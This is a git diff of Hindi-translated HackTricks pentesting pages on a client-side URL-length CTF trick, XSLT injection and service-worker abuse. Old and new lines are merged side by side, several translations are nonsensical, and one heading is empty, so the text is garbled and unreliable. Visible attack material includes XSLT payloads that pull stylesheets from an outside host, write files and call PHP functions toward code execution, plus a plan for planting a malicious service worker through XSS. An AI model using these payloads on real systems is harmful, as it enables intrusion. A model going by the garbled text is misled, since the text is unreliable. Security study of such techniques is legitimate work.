* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** पर **फॉलो** करें
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को** * **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details> </details>

View file

@ -1,18 +1,18 @@
# URL अधिकतम लंबाई - क्लाइंट साइड # URL Max Length - Client Side
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबरसिक्योरिटी कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को हैकट्रिक्स में विज्ञापित देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीज**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **जुड़ें** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**telegram समूह**](https://t.me/peass) से या **Twitter पर** मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **अपनी हैकिंग ट्रिक्स साझा करें, hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में PRs सबमिट करके.** * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** (https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को PR जमा करके**
</details> </details>
कोड [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit) से Code from [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)
```html ```html
<html> <html>
<body></body> <body></body>
@ -82,10 +82,10 @@ app.run(host='0.0.0.0', port=1337)
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों** या [**telegram समूह**](https://t.me/peass) या **Twitter पर** मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपनी हैकिंग ट्रिक्स साझा करें, hacktricks repo** को PRs सबमिट करके [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). * **हैकिंग ट्रिक्स साझा करें** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को PRs सबमिट करके**
</details> </details>

View file

@ -4,25 +4,25 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीज़**](https://opensea.io/collection/the-peass-family) संग्रह। * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीज़**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें। * [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) पर PR जमा करके**। * **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**.
</details> </details>
## मूल जानकारी ## मूल जानकारी
XSLT एक प्रौद्योगिकी है जो XML दस्तावेज़ों को विभिन्न प्रारूपों में रूपांतरित करने के लिए प्रयोग की जाती है। इसके तीन संस्करण हैं: 1, 2, और 3, जिसमें संस्करण 1 सबसे अधिक प्रयोग किया जाता है। रूपांतरण प्रक्रिया को सर्वर पर या ब्राउज़र के अंदर चलाया जा सकता है। XSLT एक प्रौद्योगिकी है जो XML दस्तावेज़ों को विभिन्न प्रारूपों में रूपांतरित करने के लिए प्रयोग की जाती है। इसमें तीन संस्करण होते हैं: 1, 2, और 3, जिसमें संस्करण 1 सबसे अधिक प्रयोग किया जाता है। रूपांतरण प्रक्रिया को सर्वर पर या ब्राउज़र के अंदर चलाया जा सकता है।
सबसे अधिक प्रयोग किए जाने वाले फ्रेमवर्क हैं: सबसे अधिक प्रयोग किए जाने वाले फ्रेमवर्क शामिल हैं:
- **Gnome** से **Libxslt**, - **Gnome** से **Libxslt**,
- **Apache** से **Xalan**, - **Apache** से **Xalan**,
- **Saxonica** से **Saxon** - **Saxonica** से **Saxon**
XSLT के संबंधित दुरुपयोगों का उपयोग करने के लिए, यह आवश्यक है कि सर्वर साइड पर xsl टैग संग्रहीत किए जाएं, इसके बाद उस सामग्री तक पहुंचा जाए। इस तरह की एक दुरुपयोग की चित्रण निम्नलिखित स्रोत में दर्ज किया गया है: [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/). XSLT के संबंधित वंशातिकता का शोधन करने के लिए, यह आवश्यक है कि एक्सएसएल टैग सर्वर साइड पर संग्रहीत हों, और उस सामग्री तक पहुंचा जाए। इस तरह की एक वंशातिकता का उदाहरण निम्न स्रोत में दर्ज किया गया है: [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/)
## उदाहरण - ट्यूटोरियल ## उदाहरण - ट्यूटोरियल
```bash ```bash
@ -207,7 +207,7 @@ Supports Backwards Compatibility: <xsl:value-of select="system-property('xsl:sup
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"> <esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl">
</esi:include> </esi:include>
``` ```
## जावास्क्रिप्ट इन्जेक्शन ## जावास्क्रिप्ट इजेक्शन
```xml ```xml
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/"> <xsl:template match="/">
@ -309,7 +309,7 @@ Supports Backwards Compatibility: <xsl:value-of select="system-property('xsl:sup
</xsl:template> </xsl:template>
</xsl:stylesheet> </xsl:stylesheet>
``` ```
## फ़ाइल में लिखें ## एक फ़ाइल में लिखें
### XSLT 2.0 ### XSLT 2.0
```xml ```xml
@ -330,7 +330,9 @@ Supports Backwards Compatibility: <xsl:value-of select="system-property('xsl:sup
<redirect:close file="loxal_file.txt"/> <redirect:close file="loxal_file.txt"/>
</xsl:template> </xsl:template>
``` ```
## बाहरी XSL शामिल करें ## बीडीएफ में फ़ाइलें लिखने के अन्य तरीके
## बाहरी एक्सएसएल शामिल करें
```xml ```xml
<xsl:include href="http://extenal.web/external.xsl"/> <xsl:include href="http://extenal.web/external.xsl"/>
``` ```
@ -366,9 +368,9 @@ xmlns:php="http://php.net/xsl" >
**इस पृष्ठ पर आप अन्य भाषाओं में RCE के उदाहरण देख सकते हैं:** [**https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt\_injection#C%23%2FVB.NET%2FASP.NET**](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt\_injection#C%23%2FVB.NET%2FASP.NET) **(C#, Java, PHP)** **इस पृष्ठ पर आप अन्य भाषाओं में RCE के उदाहरण देख सकते हैं:** [**https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt\_injection#C%23%2FVB.NET%2FASP.NET**](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt\_injection#C%23%2FVB.NET%2FASP.NET) **(C#, Java, PHP)**
## **कक्षाओं से PHP स्थैतिक फ़ंक्शन्स तक पहुंचें** ## **कक्षाओं से PHP स्थैतिक फ़ंक्शन का उपयोग करें**
निम्नलिखित फ़ंक्शन XSL कक्षा के स्थैतिक विधि `stringToUrl` को बुलाएगा: निम्नलिखित फ़ंक्शन XSL की कक्षा के स्थैतिक विधि `stringToUrl` को बुलाएगा:
```xml ```xml
<!--- More complex test to call php class function--> <!--- More complex test to call php class function-->
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"
@ -401,10 +403,10 @@ version="1.0">
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित किया जाए**? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * खोजें [**द पीएएस फैमिली**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* पाएं [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * पाएं [**आधिकारिक पीएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके**। * **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details> </details>

View file

@ -1,20 +1,22 @@
# वेब सर्विस वर्कर्स का दुरुपयोग # सेवा कर्मचारियों का दुरुपयोग
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापन देखना चाहते हैं**? या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह। * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें। * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें। * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में।** * **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**
</details> </details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
वे सुरक्षा विकल्प खोजें जो सबसे अधिक मायने रखते हैं ताकि आप उन्हें तेजी से ठीक कर सकें। इंट्रूडर आपकी हमले की सतह का ट्रैक करता है, प्रोएक्टिव धमकी स्कैन चलाता है, आपके पूरे तकनीकी स्टैक, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक मुद्दे खोजता है। [**इसे मुफ्त में प्रयास करें**](https://www.intruder.io/?utm_source=referral\&utm_campaign=hacktricks) आज। वे सुरक्षा गड़बड़ियों को खोजें जो सबसे अधिक मायने रखती हैं ताकि आप उन्हें तेजी से ठीक कर सकें। इंट्रूडर आपकी हमले की सतह का ट्रैक करता है, प्रोएक्टिव धमकी स्कैन चलाता है, आपकी पूरी तकनीक स्टैक, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक मुद्दे खोजता है। [**इसे मुफ्त में प्रयास करें**](https://www.intruder.io/?utm_source=referral\&utm_campaign=hacktricks) आज।
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -22,31 +24,32 @@
## मूल जानकारी ## मूल जानकारी
**सर्विस वर्कर** एक स्क्रिप्ट है जो आपके ब्राउज़र द्वारा पृष्ठ से अलग, वेब पृष्ठ या उपयोगकर्ता अंतर्क्रिया की आवश्यकता नहीं है, जिससे **ऑफलाइन और पृष्ठ प्रसंस्करण** क्षमताएँ बढ़ाई जा सकती हैं। सर्विस वर्कर्स पर विस्तृत जानकारी [यहाँ](https://developers.google.com/web/fundamentals/primers/service-workers) मिल सकती है। एक वेब डोमेन के भीतर सर्विस वर्कर्स का दुरुपयोग करके हमलावर विकल्पों को प्राप्त कर सकते हैं और उस डोमेन के सभी पृष्ठों के साथ पीड़ित के इंटरैक्शन पर नियंत्रण प्राप्त कर सकते हैं। **सेवा कर्मचारी** एक स्क्रिप्ट है जो आपके ब्राउज़र द्वारा पृष्ठ से अलग, किसी भी वेब पृष्ठ या उपयोगकर्ता अंतर्क्रिया की आवश्यकता नहीं है, जिससे **ऑफलाइन और पृष्ठ प्रसंस्करण** क्षमताएँ बढ़ाई जा सकती हैं। सेवा कर्मचारियों पर विस्तृत जानकारी [यहाँ](https://developers.google.com/web/fundamentals/primers/service-workers) मिल सकती है। एक विकल्पीय वेब डोमेन के भीतर सेवा कर्मचारियों का दुरुपयोग करके हमलावर वेब डोमेन के सभी पृष्ठों के साथ पीड़ित के इंटरैक्शन पर नियंत्रण प्राप्त कर सकते हैं।
### मौजूदा सर्विस वर्कर्स की जांच
मौजूदा सर्विस वर्कर्स की जांच **डेवलपर टूल्स** में **एप्लिकेशन** टैब के **सर्विस वर्कर्स** खंड में की जा सकती है। एक और तरीका है [chrome://serviceworker-internals](https://chromium.googlesource.com/chromium/src/+/main/docs/security/chrome%3A/serviceworker-internals) पर जाकर एक अधिक विस्तृत दृश्य प्राप्त करना। ### मौजूदा सेवा कर्मचारियों की जांच
### पुश अधिसूचनाएं मौजूदा सेवा कर्मचारियों की जांच **डेवलपर टूल्स** में **एप्लिकेशन** टैब के **सेवा कर्मचारियों** खंड में की जा सकती है। एक और तरीका है [chrome://serviceworker-internals](https://chromium.googlesource.com/chromium/src/+/main/docs/security/chrome%3A/serviceworker-internals) पर जाकर एक अधिक विस्तृत दृश्य प्राप्त करना।
**पुश अधिसूचना अनुमतियाँ** सीधे रूप से **सर्विस वर्कर** की क्षमता पर प्रभाव डालती हैं क्योंकि यह सर्विस वर्कर की संभावना को सीधे उपयोगकर्ता अंतर्क्रिया के बिना सर्वर के साथ संवाद करने की क्षमता पर प्रभाव डालती है। यदि अनुमतियाँ निरस्त की जाती हैं, तो यह सर्विस वर्कर की संभावना को एक निरंतर खतरा प्रस्तुत करने में सीमित करता है। उल्टे, अनुमतियाँ प्रदान करने से सुरक्षा जोखिम बढ़ जाते हैं क्योंकि यह संभावित दुरुपयोगों को प्राप्त करने और क्रियान्वित करने की क्षमता को सक्षम करता है। ### पुश सूचनाएं
## हमला एक सर्विस वर्कर बनाना **पुश सूचना अनुमतियाँ** सीधे रूप से **सेवा कर्मचारी** की क्षमता पर प्रभाव डालती हैं कि सर्वर के साथ संवाद करने की क्षमता उपयोगकर्ता के सीधे अंतर्क्रिया के बिना। यदि अनुमतियाँ निरस्त की जाती हैं, तो यह सेवा कर्मचारी की संभावनाओं को एक सतत धमकी पेश करने की सीमा लगाता है। उलट, अनुमतियाँ प्रदान करने से सुरक्षा जोखिम बढ़ जाते हैं क्योंकि यह संभावित दुरुपयोगों के प्राप्ति और क्रियान्वयन को सक्षम करता है।
इस विकल्प को दुरुपयोग करने के लिए आपको निम्नलिखित की खोज करनी होगी: ## हमला एक सेवा कर्मचारी बनाना
* **सर्वर पर विभिन्न JS फ़ाइलें अपलोड करने** का एक तरीका और एक **XSS जिससे अपलोड की गई JS फ़ाइल का सर्विस वर्कर लोड हो** इस विकल्प को शारीरिक करने के लिए आपको निम्नलिखित की खोज करनी होगी:
* **एक वंलरेबल JSONP अनुरोध** जहां आप **आउटपुट को (विभिन्न JS कोड के साथ) मानिपुलेट कर सकते हैं** और एक **XSS** जिससे **JSONP को एक पेलोड के साथ लोड करने** के लिए **एक दुरुपयोग जोड़ें** जो **एक दुरुपयोगी सर्विस वर्कर लोड करेगा**
